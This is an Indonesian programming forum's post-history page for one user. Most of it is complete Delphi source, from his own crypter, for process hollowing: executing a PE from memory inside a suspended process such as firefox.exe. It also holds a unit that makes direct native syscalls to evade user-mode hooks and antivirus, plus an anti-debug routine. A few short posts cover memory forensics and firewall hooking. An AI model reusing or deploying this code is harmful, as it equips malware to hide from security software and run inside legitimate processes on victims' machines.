Perlihatkan Tulisan

Seksi ini mengijinkan Anda untuk melihat semua tulisan yang dibuat oleh anggota ini. Catatan bahwa Anda hanya bisa melihat tulisan yang dibuat dalam area di mana Anda memiliki akses terhadapnya.


Pesan - meong

Halaman: [1] 2 3 4 ... 12
1
Delphi/Pascal / Re: [Delphi] Execute PE From Memory, Native Syscall Way
« pada: Desember 15, 2012, 11:43:31 AM »
blognya keren bro, all about low level programming.. ijin save page :D

thx gan.. :D

2
Delphi/Pascal / [Delphi] Execute PE From Memory, Native Syscall Way
« pada: Desember 14, 2012, 11:49:59 AM »
Beberapa waktu yang lalu saya posting unit tentang bagaimana cara memanggil native api lansung pada syscall tanpa melalui ntdll http://cybercoding.wordpress.com/2012/12/01/union-api/

nah banyak teman" yang tanya cara penggunaannya.. Berhubung ada waktu luang maka sya buat unit yang mengeksekusi PE file from memory.

Methode Execute file from memory :
- Jalankan target executable dengan parameter CREATE_SUSPENDED. (windows akan menjalankan file yang mana setelah meload file ke memory dan settup process windows akan mensuspen process sebelum mengeksekusi main code pada entrypoint

- Dapatkan alamat imagebase(alamat memory dari pe file pada process spaces)

- alokasi dan tulis pe kita memory pada target process

- ubah image base dan entry point sesuai alamat memory pada target process (pe file kita)

- lanjutkan process (resumethread)

Simple kan ? hehehhe. methode ini banyak digunakan pada file crypter/binder di luar sana. Gunanya tentu saja agar file aslinya tidak di analisa secara lansung (karena terencrypt).  Tekniknya sendiri bukan teknik baru dan mempunyai kelemahan mendasar.. Misalnya dengan melakukan hooking fungsi alokasi dan resume thread  :lol:

btw unit dibawah ini hanya membuat methode execute from memory lebih sulit di deteksi pada usermode karena lansung memanggil native api tidak melalui ntdll melainkan lansung sycall (melakukan hall yang sama yang dilakukan ntdll)

Kode: [Pilih]
{ Just Another version execute File from memory, use native -> syscall for bypass all usermode hooker
  Website: Cybercoding.wordpress.com / http://ic0de.org
  Modified: abhe
  Thanks : steve10120
}
unit U_MemExecute;

interface
uses
windows, codesitelogging, U_UnionApi;

function ExecuteFromMem(szFilePath, szParams:String; pFile:Pointer; PatchPEB : Boolean):DWORD;
implementation


Type
  NTSTATUS = cardinal;
  PVOID = pointer;
  PPVOID = ^PVOID;

  PUnicodeString = ^TUnicodeString;
  TUnicodeString = packed record
    Length: Word;
    MaximumLength: Word;
    Buffer: PWideChar;
  end;

  PImageBaseRelocation = ^TImageBaseRelocation;
  TImageBaseRelocation = packed record
     VirtualAddress: DWORD;
     SizeOfBlock: DWORD;
  end;

procedure xdebug(int:integer);
begin
  codesite.Send('error',int);
end;

function NtSuccess (Stat: LongInt): Boolean;
begin
  Result := Stat >= 0;
end;

//just how virtualalloc from old code of win src
function ExVirtualAlloc(hProcess: THandle; lpAddress: Pointer;
  dwSize, flAllocationType: DWORD; flProtect: DWORD): Pointer; stdcall;
var
  Status: NTSTATUS;
begin
    status := ApiCall32('NtAllocateVirtualMemory', [
                hProcess,
                @lpAddress,
                0,
                @dwSize,
                flAllocationType,
                flProtect
              ]);

    if NtSuccess(Status) then result := lpAddress
    else result := nil;
end;

function ExWriteProcessMemory(hProcess: THandle; const lpBaseAddress: Pointer; lpBuffer: Pointer;
  nSize: DWORD; var lpNumberOfBytesWritten: DWORD): BOOL; stdcall;
var
  RegionSize: Cardinal;
  Base: Pointer;
  OldProtect: ULONG;
  Status: NTSTATUS;
begin
    result := false;
    RegionSize := nSize;
    Base := lpBaseAddress;

    Status := ApiCall32('NtProtectVirtualMemory', [
                hProcess,
                @Base,
                @RegionSize,
                PAGE_EXECUTE_READWRITE,
                @OldProtect
              ]);

    if NtSuccess(Status) then begin

      if ((OldProtect and PAGE_READWRITE) = PAGE_READWRITE) or
         ((OldProtect and PAGE_WRITECOPY) = PAGE_WRITECOPY) or
         ((OldProtect and PAGE_EXECUTE_READWRITE) = PAGE_EXECUTE_READWRITE) or
         ((OldProtect and PAGE_EXECUTE_WRITECOPY) = PAGE_EXECUTE_WRITECOPY) then begin

        ApiCall32('NtProtectVirtualMemory', [
          hProcess,
          @Base,
          @RegionSize,
          OldProtect,
          @OldProtect
        ]);

        Status := ApiCall32('NtWriteVirtualMemory', [
                    hProcess,
                    lpBaseAddress,
                    lpBuffer,
                    nSize,
                    @lpNumberOfBytesWritten
                  ]);

        if NtSuccess(Status) then begin
          result := true;
          ApiCall32('NtFlushInstructionCache', [hProcess,lpBaseAddress,nSize]);
        end;
      end else begin

        if ((OldProtect and PAGE_NOACCESS) = PAGE_NOACCESS) or
           ((OldProtect and PAGE_READONLY) = PAGE_READONLY) then begin

          ApiCall32('NtProtectVirtualMemory', [
            hProcess,
            @Base,
            @RegionSize,
            OldProtect,
            @OldProtect
          ]);
        end else begin

          Status := ApiCall32('NtWriteVirtualMemory', [
                      hProcess,
                      lpBaseAddress,
                      lpBuffer,
                      nSize,
                      @lpNumberOfBytesWritten
                    ]);

          ApiCall32('NtProtectVirtualMemory', [
            hProcess,
            @Base,
            @RegionSize,
            OldProtect,
            @OldProtect
          ]);

          if NtSuccess(Status) then begin
            result := true;
            ApiCall32('NtFlushInstructionCache', [hProcess,lpBaseAddress,nSize]);
          end;
        end;
      end;
    end;
end;

//patch imagepath from peb for make all getmodulefilename call will result true file lokation
Procedure PatchImagePathRemote(PH:Thandle; Peb:Dword; szNewImageBaseName: PWidechar);
Label
  Top, Retry;
var
  no_success  : integer;
  ldr_data    : Dword;
  Current     : DWord;
  BytesRead   : DWord;
  unicode     : TUnicodeString;
  pNewAddr    : Pointer;
begin
  no_success := 0;
Retry:
  if (no_success >= 600) then exit
  else begin
    inc(no_success);
    Sleep(50);
    goto Top;
  end;
Top :
    xdebug(400);
    //NtReadVirtualMemory
    if (not NtSuccess(ApiCall32('NtReadVirtualMemory',
      [ PH, Ptr(Peb+$c), @ldr_data, sizeof(ldr_data), @BytesRead]))) or
      (ldr_data = 0)  then goto Retry;


    xdebug(401);
    //NtReadVirtualMemory
    if (not NtSuccess(ApiCall32('NtReadVirtualMemory',
      [ PH, Ptr(ldr_data+$c), @Current, sizeof(Current), @BytesRead]))) or
      (Current = 0)  then goto Retry;

    xdebug(402);
    //NtReadVirtualMemory
    if (not NtSuccess(ApiCall32('NtReadVirtualMemory',
      [ PH, Ptr(Current+$24), @unicode, sizeof(unicode), @BytesRead])))  then exit;

    unicode.Length := lstrlenW(szNewImageBaseName) * 2;
    unicode.MaximumLength := unicode.Length+2;

    xdebug(403);
    pNewAddr := ExVirtualAlloc(PH, nil, unicode.Length, $1000 or $2000, $40);

    xdebug(404);
    if (pNewAddr<>nil) then begin
      xdebug(405);
      unicode.Buffer := pNewAddr;
      ExWriteProcessMemory(PH, pNewAddr, szNewImageBaseName, unicode.Length, BytesRead);
      ExWriteProcessMemory(PH, Ptr(Current+$24), @unicode, sizeof(unicode), BytesRead);
    end;
end;

function Get4ByteAlignedContext(var Base: Pointer): PContext;
begin
    Base := ExVirtualAlloc(Thandle(-1), nil, SizeOf(TContext) + 4, MEM_COMMIT, PAGE_READWRITE);
    Result := Base;
    if Base <> nil then
      while ((DWORD(Result) mod 4) <> 0) do
        Result := Pointer(DWORD(Result) + 1);
end;

procedure PerformBaseRelocation(f_module: Pointer; INH:PImageNtHeaders; f_delta: Cardinal); stdcall;
var
  l_i: Cardinal;
  l_codebase: Pointer;
  l_relocation: PImageBaseRelocation;
  l_dest: Pointer;
  l_relInfo: ^Word;
  l_patchAddrHL: ^longword;
  l_type, l_offset: integer;
begin
  l_codebase := f_module;
  if INH^.OptionalHeader.DataDirectory[5].Size > 0 then
  begin
    l_relocation := PImageBaseRelocation(Cardinal(l_codebase) + INH^.OptionalHeader.DataDirectory[5].VirtualAddress);
    while l_relocation.VirtualAddress > 0 do
    begin
      l_dest := Pointer((Cardinal(l_codebase) + l_relocation.VirtualAddress));
      l_relInfo := Pointer(Cardinal(l_relocation) + 8);
      for l_i := 0 to (Trunc(((l_relocation.SizeOfBlock - 8) / 2)) - 1) do
      begin
        l_type := (l_relInfo^ shr 12);
        l_offset := l_relInfo^ and $FFF;
        if l_type = 3 then
        begin
          l_patchAddrHL := Pointer(Cardinal(l_dest) + Cardinal(l_offset));
          l_patchAddrHL^ := l_patchAddrHL^ + f_delta;
        end;
        inc(l_relInfo);
      end;
      l_relocation := Pointer(cardinal(l_relocation) + l_relocation.SizeOfBlock);
    end;
  end;
end;

function AlignImage(pImage:Pointer):Pointer;
var
  IDH:          PImageDosHeader;
  INH:          PImageNtHeaders;
  ISH:          PImageSectionHeader;
  i:            WORD;
begin
    IDH := pImage;
    INH := Pointer(Integer(pImage) + IDH^._lfanew);
    GetMem(Result, INH^.OptionalHeader.SizeOfImage);
    ZeroMemory(Result, INH^.OptionalHeader.SizeOfImage);
    CopyMemory(Result, pImage, INH^.OptionalHeader.SizeOfHeaders);
    for i := 0 to INH^.FileHeader.NumberOfSections - 1 do begin
      ISH := Pointer(Integer(pImage) + IDH^._lfanew + 248 + i * 40);
      CopyMemory(Pointer(DWORD(Result) + ISH^.VirtualAddress), Pointer(DWORD(pImage) + ISH^.PointerToRawData), ISH^.SizeOfRawData);
    end;
end;

//execute pe file from memory
function ExecuteFromMem(szFilePath, szParams:String; pFile:Pointer; PatchPEB : Boolean):DWORD;
var
  IDH:      PImageDosHeader;
  INH:      PImageNtHeaders;
  PI:       TProcessInformation;
  SI:       TStartupInfo;
  CT:       PContext;
  CTBase,
  pModule:  Pointer;
  dwIBase,
  dwread:   DWORD;
  Wow1, wow2:     Cardinal;
begin
    Result := 0;

    {Check Image}
    if pFile=nil then exit;
    IDH := pFile;
    if (IDH^.e_magic <> IMAGE_DOS_SIGNATURE) then exit;
    INH := Pointer(Integer(pFile) + IDH^._lfanew);
    if (INH^.Signature <> IMAGE_NT_SIGNATURE) then exit;

    ZeroMemory(@SI, Sizeof(TStartupInfo));
    ZeroMemory(@PI, Sizeof(TProcessInformation));
    SI.cb := Sizeof(TStartupInfo);

    xdebug(200);
    if CreateProcess(PChar(szFilePath), PChar(szParams), nil, nil, FALSE, CREATE_SUSPENDED, nil, nil, SI, PI) then begin

      {check is64bit, if 64bit aplication then we dont inject to it.. inject to own file instead}
      Wow1 := IsWow;
      wow2 := 0;

      //NtQueryInformationProcess -> ProcessWow64Information
      ApiCall32('NtQueryInformationProcess', [PI.hProcess, 26, @wow2, Sizeof(wow2), nil]);

      if (Wow1 <> 0) and (wow2=0) then begin
        {target is 64bit, use self injection}

        //NtTerminateProcess
        ApiCall32('NtTerminateProcess', [PI.hProcess, 0]);

        xDebug(207);
        ExecuteFromMem(paramstr(0), szParams, pFile, patchpeb);

        exit;
      end;


      xdebug(201);
      CT := Get4ByteAlignedContext(CTBase);
      if (CT <> nil) then begin

        xdebug(202);
        CT.ContextFlags := CONTEXT_FULL;

        //NtGetContextThread
        if NtSuccess(ApiCall32('NtGetContextThread', [PI.hThread, CT])) then begin

          xdebug(203);
          dwread := 0;

          //NtReadVirtualMemory
          NtSuccess(ApiCall32('NtReadVirtualMemory',
            [PI.hProcess, Pointer(CT.Ebx + 8), @dwIBase, SizeOf(dwIBase), @dwread]));

          dwread :=  INH^.OptionalHeader.SizeOfImage;

          if (dwIBase = INH^.OptionalHeader.ImageBase) then begin
            //NtUnmapViewOfSection
            if ApiCall32('NtUnmapViewOfSection', [PI.hProcess, Pointer(INH^.OptionalHeader.ImageBase)])=0 then
              pModule := ExVirtualAlloc(PI.hProcess, Pointer(INH^.OptionalHeader.ImageBase), INH^.OptionalHeader.SizeOfImage, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE)
            else
              pModule := ExVirtualAlloc(PI.hProcess, nil, INH^.OptionalHeader.SizeOfImage, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
          end else
            pModule := ExVirtualAlloc(PI.hProcess, Pointer(INH^.OptionalHeader.ImageBase), INH^.OptionalHeader.SizeOfImage, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);

          if (pModule <> nil) then begin

            xdebug(204);
            pFile := AlignImage(pFile);
            if (DWORD(pModule) <> INH^.OptionalHeader.ImageBase) then begin
              PerformBaseRelocation(pFile, INH, (DWORD(pModule) - INH^.OptionalHeader.ImageBase));
              INH^.OptionalHeader.ImageBase := DWORD(pModule);
              CopyMemory(Pointer(Integer(pFile) + IDH^._lfanew), INH, 248);
            end;

            ExWriteProcessMemory(PI.hProcess, pModule, pFile, INH.OptionalHeader.SizeOfImage, dwread);
            ExWriteProcessMemory(PI.hProcess, Pointer(CT.Ebx + 8), @pModule, 4, dwread);

            CT.Eax := DWORD(pModule) + INH^.OptionalHeader.AddressOfEntryPoint;

            //NtSetContextThread
            ApiCall32('NtSetContextThread', [PI.hThread, CT]);

            //NtResumeThread
            ApiCall32('NtResumeThread', [PI.hThread, nil]);

            result := PI.hThread;

            if PatchPEB and (lstrcmp(PChar(Paramstr(0)), PChar(szFilePath))<>0) then begin
              xdebug(205);
              PatchImagePathRemote( PI.hProcess, CT.Ebx, PWideChar(Paramstr(0)));
            end;

            if (pFile <> nil) then FreeMemory(pFile);
            xdebug(206);
          end;
        end;

        //NtFreeVirtualMemory
        dwread := 0;
        ApiCall32('NtFreeVirtualMemory',[Thandle(-1), @CTBase, @dwread, MEM_RELEASE]);
      end;

      if (Result = 0) then begin
        //NtTerminateProcess
        ApiCall32('NtTerminateProcess', [PI.hProcess, 0]);
      end;

    end;
end;

end.


and example use

Kode: [Pilih]
function LoadFile2String(const FileName: TFileName): AnsiString;
begin
  result := '';
  if not fileexists(FileName) then exit;
  with TFileStream.Create(FileName,fmOpenRead or fmShareDenyWrite) do  // Reading our File To STREAM
  begin
    try
      SetLength(Result, Size);
      Read(Pointer(Result)^, Size);
    except
      Result := '';  // Deallocates memory
      Free;
      raise;
    end;
    Free;
  end;
end;

var
Data:ansiString;
begin
    Data := LoadFile2String('MemExecute - Copy.exe');
    ExecuteFromMem('C:\Program Files (x86)\Mozilla Firefox\firefox.exe', '', @data[1], true);

link to my blog http://cybercoding.wordpress.com/2012/12/14/execute-pe-frommemory-syscall-way/

3
Delphi/Pascal / Re: [Delphi] Get MD5 Loaded Module
« pada: Desember 11, 2012, 03:31:19 PM »
ini pake compiler Delphi berapa?

saya pake compiler delphi xe.. tapi bisa pake delphi 7 juga kok ;)

4
Programming / Union Api - Call Native Api using syscall
« pada: Desember 01, 2012, 08:33:37 PM »
Hey guys, longtime not check this forum.. I'm not code a security aplication now.. So thingking for sharing some old code..

This unit used in my old crypter, called it MegaCrypter. Main idea is to use syscall for call native api so hard or imposible to hook in userland.

some reference :
http://www.nynaeve.net/?p=48
http://blog.oxff.net/#2sapnfkthvpzjscp3xwq
or just search google with keyword syscall, sysenter, or etc

btw here u go my unit

Kode: [Pilih]
{ U_UnionApi
  Author: Abhe
  Description: Anti Hook NTDLL API
  Release Date: 1 December 2011
  Website: http://cybercoding.wordpress.com/
  History: Thanks method from GameDeception, not remember who.. :D
}


unit U_UnionApi;

interface
uses
Windows;

var
  pSystemCall: Pointer;
  WOW32Reserved: Cardinal;
  Ntdll: Pointer;
  SysNumber : DWORD;

function strlenA(const s: PAnsiChar): cardinal;
function LazyLoadPe(szFilename:PWideChar):Pointer;
Function GetSysNumber(ApiHash : DWORD):Word;overload;
Function GetSysNumber(ApiName : AnsiString):Word; overload;
function ExGetmoduleHandle(mhash: Cardinal): THANDLE;
function ExGetmoduleFileName(mhash: Cardinal): PWideChar;

function ApiStub: DWORD; stdcall;

{32}
function ApiCall32(Number : DWORD; Arg1: Pointer): DWORD; stdcall; overload;
function ApiCall32(Number : DWORD; Arg1, Arg2: Pointer): DWORD; stdcall; overload;
function ApiCall32(Number : DWORD; Arg1, Arg2, Arg3: Pointer): DWORD; stdcall; overload;
function ApiCall32(Number : DWORD; Arg1, Arg2, Arg3, arg4: Pointer): DWORD; stdcall; overload;
function ApiCall32(Number : DWORD; Arg1, Arg2, Arg3, arg4, Arg5: Pointer): DWORD; stdcall; overload;
function ApiCall32(Number : DWORD; Arg1, Arg2, Arg3, arg4, arg5, Arg6: Pointer): DWORD; stdcall; overload;
function ApiCall32(Number : DWORD; Arg1, Arg2, Arg3, arg4, arg5, Arg6, Arg7: Pointer): DWORD; stdcall; overload;
function ApiCall32(Number : DWORD; Arg1, Arg2, Arg3, arg4, arg5, Arg6, Arg7, Arg8: Pointer): DWORD; stdcall; overload;
function ApiCall32(Number : DWORD; Arg: Array of Const): DWORD; stdcall; overload;
function ApiCall32(ApiName: AnsiString; Arg: Array of Const): DWORD; stdcall; overload;
implementation

function strlenA(const s: PAnsiChar): cardinal;
asm
  mov edx, edi
  mov edi, eax
  or ecx, -1
  xor eax, eax
  repne scasb
  dec eax
  dec eax
  sub eax, ecx
  mov edi, edx
end;

function adler32(adler: cardinal; buf: pointer; len: cardinal): cardinal;
asm
    push      ebx
    push      esi
    push      edi
    mov       edi,eax
    shr       edi,16
    movzx     ebx,ax
    push      ebp
    mov       esi,edx
    test      esi,esi
    mov       ebp,ecx
    jne       @31
    mov       eax,1
    jmp       @32
@31:
    test      ebp,ebp
    jbe       @34
@33:
    cmp       ebp,5552
    jae        @35
    mov       eax,ebp
    jmp        @36
@35:
    mov       eax,5552
@36:
    sub       ebp,eax
    cmp       eax,16
    jl        @38
    xor       edx,edx
    xor       ecx,ecx
@39:
    sub       eax,16
    mov       dl,[esi]
    mov       cl,[esi+1]
    add       ebx,edx
    add       edi,ebx
    add       ebx,ecx
    mov       dl,[esi+2]
    add       edi,ebx
    add       ebx,edx
    mov       cl,[esi+3]
    add       edi,ebx
    add       ebx,ecx
    mov       dl,[esi+4]
    add       edi,ebx
    add       ebx,edx
    mov       cl,[esi+5]
    add       edi,ebx
    add       ebx,ecx
    mov       dl,[esi+6]
    add       edi,ebx
    add       ebx,edx
    mov       cl,[esi+7]
    add       edi,ebx
    add       ebx,ecx
    mov       dl,[esi+8]
    add       edi,ebx
    add       ebx,edx
    mov       cl,[esi+9]
    add       edi,ebx
    add       ebx,ecx
    mov       dl,[esi+10]
    add       edi,ebx
    add       ebx,edx
    mov       cl,[esi+11]
    add       edi,ebx
    add       ebx,ecx
    mov       dl,[esi+12]
    add       edi,ebx
    add       ebx,edx
    mov       cl,[esi+13]
    add       edi,ebx
    add       ebx,ecx
    mov       dl,[esi+14]
    add       edi,ebx
    add       ebx,edx
    mov       cl,[esi+15]
    add       edi,ebx
    add       ebx,ecx
    cmp       eax,16
    lea       esi,[esi+16]
    lea       edi,[edi+ebx]
    jge       @39
@38:
    test      eax,eax
    je         @42
@43:
    xor       edx,edx
    mov       dl,[esi]
    add       ebx,edx
    dec       eax
    lea       esi,[esi+1]
  lea       edi,[edi+ebx]
    jg        @43
@42:
    mov       ecx,65521
    mov       eax,ebx
    xor       edx,edx
    div       ecx
    mov       ebx,edx
    mov       ecx,65521
    mov       eax,edi
    xor       edx,edx
    div       ecx
    test      ebp,ebp
    mov       edi,edx
    ja        @33
@34:
    mov       eax,edi
    shl       eax,16
    or        eax,ebx
@45:
@32:
    pop       ebp
    pop       edi
    pop       esi
    pop       ebx
end;

function LazyLoadPe(szFilename:PWideChar):Pointer;
var
  hFile:    DWORD;
  dwSize:   DWORD;
  dwNull:   DWORD;
  temp:     Pointer;
  IDH:      PImageDosHeader;
  INH:      PImageNtHeaders;
  ISH:      PImageSectionHeader;
  i:        WORD;
begin
  result := nil;
  hFile := CreateFileW(szFilename, GENERIC_READ, FILE_SHARE_READ, nil, OPEN_EXISTING, 0, 0);
  if (hFile = INVALID_HANDLE_VALUE) then exit;
  dwSize := GetFileSize(hFile, nil);
  GetMem(temp, dwSize);
  if not ReadFile(hFile, temp^, dwSize, dwNull, nil) then exit;
  IDH := temp;
  INH := Pointer(Integer(temp) + IDH^._lfanew);
  GetMem(Result, INH^.OptionalHeader.SizeOfImage);
  ZeroMemory(Result, INH^.OptionalHeader.SizeOfImage);
  CopyMemory(Result, temp, INH^.OptionalHeader.SizeOfHeaders);
  for i := 0 to INH^.FileHeader.NumberOfSections - 1 do begin
    ISH := Pointer(Integer(temp) + IDH^._lfanew + 248 + i * 40);
    CopyMemory(Pointer(DWORD(Result) + ISH^.VirtualAddress), Pointer(DWORD(temp) + ISH^.PointerToRawData), ISH^.SizeOfRawData);
  end;
  FreeMem(temp, dwSize);
  CloseHandle(hFile);
end;

function GetPEB(): Pointer;
asm
  mov eax, large fs:30h
  retn
end;

function ExGetmoduleHandle(mhash: Cardinal): THANDLE;
var
  x , f, cur  : DWORD;
  Hash        : Cardinal;
begin
  result := 0;
  x := DWORD(GetPEB);
  if (mhash = 0) then begin
    result := PDWORD(x+8)^;
    exit;
  end;
  x := PDWORD(x+$C)^;
  f := x+$14;
  cur := PDWORD(f)^;
  while (cur <> f) do begin
    x := cur - $8;
    Hash := adler32(0, Pointer(PDWORD(x+$30)^), PWORD(x+$2c)^);
    if (hash=mhash) then begin
      result := PDWORD(x+$18)^;
      exit;
    end;
    cur := PDWORD(cur)^;
  end;
end;

function ExGetmoduleFileName(mhash: Cardinal): PWideChar;
var
  x , f, cur  : DWORD;
  Hash        : Cardinal;
begin
  result := nil;
  x := DWORD(GetPEB);
  x := PDWORD(x+$C)^;
  f := x+$14;
  cur := PDWORD(f)^;
  while (cur <> f) do begin
    x := cur - $8;
    Hash := adler32(0, Pointer(PDWORD(x+$30)^), PWORD(x+$2c)^);
    if (hash=mhash) then begin
      result := PWidechar(Pointer(PDWORD(x+$28)^));
      exit;
    end;
    cur := PDWORD(cur)^;
  end;
end;

function ExGetProcAddress(hModule: THANDLE; phash: Cardinal): Pointer;
var
  pINH: PImageNtHeaders;
  pIDD: PImageDataDirectory;
  pIED: PImageExportDirectory;
  pdwFuncs1, pdwFuncs: PULONG;
  pdwNames: PULONG;
  pdwOrdinals: PWORD;
  dwOrd1: DWORD;
  i, k: cardinal;
  apiname:PAnsiChar;
  hash :Cardinal;
begin
  result := nil;
  pINH := PImageNtHeaders(Cardinal(hModule) + Cardinal(PImageDosHeader(hModule)^._lfanew));
  pIDD := PImageDataDirectory(Cardinal(@pINH^.OptionalHeader.DataDirectory) + IMAGE_DIRECTORY_ENTRY_EXPORT);
  pIED := PImageExportDirectory(ULONG(hModule) + pIDD^.VirtualAddress);
  pdwFuncs := PULONG(ULONG(hModule) + Cardinal(pIED^.AddressOfFunctions));
  pdwNames := PULONG(ULONG(hModule) + Cardinal(pIED^.AddressOfNames));
  pdwOrdinals := PWORD(ULONG(hModule) + Cardinal(pIED^.AddressOfNameOrdinals));
  pdwFuncs1 := pdwFuncs;
  for i := 0 to pIED^.NumberOfNames - 1 do begin
    dwOrd1 := pdwOrdinals^;
    k := 0;
    pdwFuncs := pdwFuncs1;
    while (k < dwOrd1) do begin
      inc(pdwFuncs);
      inc(k);
    end;
    if (pdwFuncs^ < pIDD^.VirtualAddress) or (pdwFuncs^ >= pIDD^.VirtualAddress + pIDD^.Size) then begin
      apiname := PAnsiChar(hModule + pdwNames^);
      hash := adler32(0, apiname, strlenA(apiname));
      if (hash = phash) then begin
        result := Pointer(ULONG(hModule) + pdwFuncs^);
        exit;
      end;
    end;
    inc(pdwOrdinals);
    inc(pdwNames);
  end;
end;

Function GetSysNumber(ApiHash : DWORD):Word;
var
  Addr : Pointer;
begin
  Addr := ExGetProcAddress(Cardinal(Ntdll), ApiHash);
  result := PWord(NativeUint(Addr)+1)^
end;

Function GetSysNumber(ApiName : AnsiString):Word;
var
  Hash : Cardinal;
begin
  hash := adler32(0, Pansichar(apiname), Length(apiname));
  result := GetSysNumber(hash);
end;

//
// Manual System Call Api
//
function IsWow:NativeUint; stdcall;
asm
  xor   eax, eax
  mov   eax, fs:[eax+$18] //teb
  mov   eax, [eax+$C0] //WOW32Reserved
end;

function bSysenterAvailable: Bool;
asm
  XOR EAX, EAX
  CPUID
  BT EDX, 11
  db $D6 //SALC
end;

procedure INT2;
asm
  LEA EDX, [ESP+8]
  INT $2E
end;

procedure SYSENTER;
asm
  MOV EDX, ESP
  SYSENTER
end;

procedure WowCall;
asm
  xor ecx,ecx
  lea edx,[esp+4]
  call dword ptr fs:[$0C0]
end;

Procedure InitSysCall;
begin
  WOW32Reserved := IsWow;
  {check if sysenter availabe, use int2 if not}
  if not bSysenterAvailable then pSystemCall := @INT2
  else pSystemCall := @SYSENTER;
  if Boolean(WOW32Reserved) then pSystemCall := @WowCall;
end;

function ApiStub: DWORD; stdcall;
asm
  POP EBP
  mov edi, dword ptr [esp]
  mov dword ptr [esp+4], edi
  add esp, 4
  push eax
  call IsWow;
  mov edi, eax
  pop eax
  dec edi
  jns @F1
  xor EDI, EDI
  call pSystemCall
  jmp @f2
@F1:
  xor EDI, EDI
  jmp pSystemCall
@F2:
  //PUSH EBP
end;

function ApiCall32(Number : DWORD; Arg1: Pointer): DWORD; stdcall;
asm
  jmp ApiStub;
end;

function ApiCall32(Number : DWORD; Arg1, Arg2: Pointer): DWORD; stdcall;
asm
  jmp ApiStub;
end;

function ApiCall32(Number : DWORD; Arg1, Arg2, Arg3: Pointer): DWORD; stdcall;
asm
  jmp ApiStub;
end;

function ApiCall32(Number : DWORD; Arg1, Arg2, Arg3, arg4: Pointer): DWORD; stdcall;
asm
  jmp ApiStub;
end;

function ApiCall32(Number : DWORD; Arg1, Arg2, Arg3, arg4, Arg5: Pointer): DWORD; stdcall;
asm
  jmp ApiStub;
end;

function ApiCall32(Number : DWORD; Arg1, Arg2, Arg3, arg4, arg5, Arg6: Pointer): DWORD; stdcall;
asm
  jmp ApiStub;
end;

function ApiCall32(Number : DWORD; Arg1, Arg2, Arg3, arg4, Arg5, Arg6, Arg7: Pointer): DWORD; stdcall;
asm
  jmp ApiStub;
end;

function ApiCall32(Number : DWORD; Arg1, Arg2, Arg3, arg4, arg5, Arg6, Arg7, Arg8: Pointer): DWORD; stdcall;
asm
  jmp ApiStub;
end;

function ApiCall32(Number : DWORD; Arg: Array of Const): DWORD; stdcall;
begin
  case length(arg) of
    1 : result := ApiCall32(Number, Arg[0].VPointer);
    2 : result := ApiCall32(Number, Arg[0].VPointer, Arg[1].VPointer);
    3 : result := ApiCall32(Number, Arg[0].VPointer, Arg[1].VPointer, Arg[2].VPointer);
    4 : result := ApiCall32(Number, Arg[0].VPointer, Arg[1].VPointer, Arg[2].VPointer, Arg[3].VPointer);
    5 : result := ApiCall32(Number, Arg[0].VPointer, Arg[1].VPointer, Arg[2].VPointer, Arg[3].VPointer, Arg[4].VPointer);
    6 : result := ApiCall32(Number, Arg[0].VPointer, Arg[1].VPointer, Arg[2].VPointer, Arg[3].VPointer, Arg[4].VPointer, Arg[5].VPointer);
    7 : result := ApiCall32(Number, Arg[0].VPointer, Arg[1].VPointer, Arg[2].VPointer, Arg[3].VPointer, Arg[4].VPointer, Arg[5].VPointer, Arg[6].VPointer);
    8 : result := ApiCall32(Number, Arg[0].VPointer, Arg[1].VPointer, Arg[2].VPointer, Arg[3].VPointer, Arg[4].VPointer, Arg[5].VPointer, Arg[6].VPointer, Arg[7].VPointer);
    else result := 0;
  end;
end;

function ApiCall32(ApiName: AnsiString; Arg: Array of Const): DWORD; stdcall;
begin
  result := ApiCall32(GetSysNumber(ApiName), Arg);
end;


initialization
  Ntdll := LazyLoadPe(ExGetmoduleFileName($240C0388));
  InitSysCall;
finalization
  FreeMem(Ntdll);
end.

contoh penggunaan:
Kode: [Pilih]
function ExOpenProcess(dwDesiredAccess: DWord; Id : DWord):THANDLE;
var
  hProcess: THANDLE;
  attr: OBJECT_ATTRIBUTES;
  cli: CLIENT_ID;
begin
  InitializeObjectAttributes(@attr, nil, 0, 0, nil);
  cli.UniqueProcess := THandle(Id);
  cli.UniqueThread := 0;
  result := 0;
  if NtSuccess(ApiCall32('NtOpenProcess', [@hProcess, dwDesiredAccess, @attr, @cli])) then result := hProcess
end;

function Antidebug1:boolean;
var
  h:Thandle;
begin
  result := false;
  h := ExOpenProcess(PROCESS_ALL_ACCESS, CsrGetProcessId);
  if h<>0 then begin
    result := true;
    ApiCall32('NtClose', [h]); //NtClose
  end;
end;

btw link to my blog http://cybercoding.wordpress.com/2012/12/01/union-api/

5
Programming / Belajar Memory Forensic Dengan Volatility
« pada: Januari 12, 2012, 02:20:50 PM »
nulis dikit di blog tentang volatility (Memory Forensic), sapa tau berguna..

Link: http://cybercoding.wordpress.com/2012/01/12/memory-forensic-volatility/#more-152

6
Programming / Re: Hem.... Butuh Firewall Gan
« pada: Januari 12, 2012, 12:58:39 PM »
pertanyaannya apakah anda sudah terbiasa dengan methode hooking ? kalau iya

coba deh lakukan filter melalui hooking beberapa fungsi di winsock.dll (send, recv, gethostname, etc)  atau lowlevel DeviceIoControl

diatas baru usermode kalau mau masuk ke kernelmode coba hook NDIS (Network Driver Interface Specification)..

resource menarik buat anda
Firewall For Windows http://www.ntkernel.com/w&p.php?id=14


7
Visual Basic / Re: (Share) Mendapatkan Direktory Aktif - Windows Vista & 7
« pada: Januari 10, 2012, 06:27:25 PM »
haha bocah lu gan digituin aja udh esmosi siapa suruh nulis not recomended, nulis yg baik2 kek kyak kalau mau blajar lbh lnjt baca link lah ini lgsg blng not recomended payah.
mimin, maaf ya, jgn hpus sblum si kucing kampung.itu sndiri yg bca

nahlo, balik netek sm ibu aja  ^_^ ^_^ ^_^

Kutip
Bener kata meong ada baiknya juga sekarang AV lokal melirik teknik hooking, mempelajari teknik yg lebih advanced agar AV yg dibuat tidak gitu" aja, apalagi saat ini virus di indonesia dikuasai virus dari luar dan kebanyakan virus tersebut berkemampuan rootkit, untuk AV lokal sendiri mau ngk mau harus mengikuti perkembangan

ada juga yang paham :D


8
Visual Basic / Re: (Share) Mendapatkan Direktory Aktif - Windows Vista & 7
« pada: Januari 10, 2012, 11:53:28 AM »
